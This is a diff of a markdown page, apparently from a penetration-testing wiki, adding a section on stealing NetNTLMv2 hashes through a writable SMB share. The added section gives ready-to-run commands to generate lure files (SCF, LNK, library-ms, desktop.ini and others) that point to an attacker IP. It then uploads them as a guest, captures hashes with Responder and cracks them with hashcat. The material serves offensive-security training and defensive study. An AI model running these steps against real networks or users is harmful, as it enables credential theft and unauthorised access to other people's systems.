|
4 | 4 |
|
5 | 5 | **Check all the great ideas from [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) from the download of a microsoft word file online to the ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)** |
6 | 6 |
|
| 7 | +### Writable SMB share + Explorer-triggered UNC lures (ntlm_theft/SCF/LNK/library-ms/desktop.ini) |
| 8 | + |
| 9 | +If you can **write to a share that users or scheduled jobs browse in Explorer**, drop files whose metadata points to your UNC (e.g. `\\ATTACKER\share`). Rendering the folder triggers **implicit SMB authentication** and leaks a **NetNTLMv2** to your listener. |
| 10 | + |
| 11 | +1. **Generate lures** (covers SCF/URL/LNK/library-ms/desktop.ini/Office/RTF/etc.) |
| 12 | + |
| 13 | +```bash |
| 14 | +git clone https://github.com/Greenwolf/ntlm_theft && cd ntlm_theft |
| 15 | +uv add --script ntlm_theft.py xlsxwriter |
| 16 | +uv run ntlm_theft.py -g all -s <attacker_ip> -f lure |
| 17 | +``` |
| 18 | + |
| 19 | +2. **Drop them on the writable share** (any folder the victim opens): |
| 20 | + |
| 21 | +```bash |
| 22 | +smbclient //victim/share -U 'guest%' |
| 23 | +cd transfer\ |
| 24 | +prompt off |
| 25 | +mput lure/* |
| 26 | +``` |
| 27 | + |
| 28 | +3. **Listen and crack**: |
| 29 | + |
| 30 | +```bash |
| 31 | +sudo responder -I <iface> # capture NetNTLMv2 |
| 32 | +hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt # autodetects mode 5600 |
| 33 | +``` |
| 34 | + |
| 35 | +Windows may hit several files at once; anything Explorer previews (`BROWSE TO FOLDER`) requires no clicks. |
7 | 36 |
|
8 | 37 | ### Windows Media Player playlists (.ASX/.WAX) |
9 | 38 |
|
@@ -145,11 +174,12 @@ README.md |
145 | 174 |
|
146 | 175 |
|
147 | 176 | ## References |
| 177 | +- [HTB: Breach – Writable share lures + Responder capture → NetNTLMv2 crack → Kerberoast svc_mssql](https://0xdf.gitlab.io/2026/02/10/htb-breach.html) |
148 | 178 | - [HTB Fluffy – ZIP .library‑ms auth leak (CVE‑2025‑24071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)](https://0xdf.gitlab.io/2025/09/20/htb-fluffy.html) |
149 | 179 | - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) |
150 | 180 | - [Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/) |
151 | 181 | - [MSRC – Microsoft mitigates Outlook EoP (CVE‑2023‑23397) and explains the NTLM leak via PidLidReminderFileParameter](https://www.microsoft.com/en-us/msrc/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/) |
152 | 182 | - [Cymulate – Zero‑click, one NTLM: Microsoft security patch bypass (CVE‑2025‑50154)](https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/) |
153 | 183 |
|
154 | 184 |
|
155 | | -{{#include ../../banners/hacktricks-training.md}} |
| 185 | +{{#include ../../banners/hacktricks-training.md}} |
0 commit comments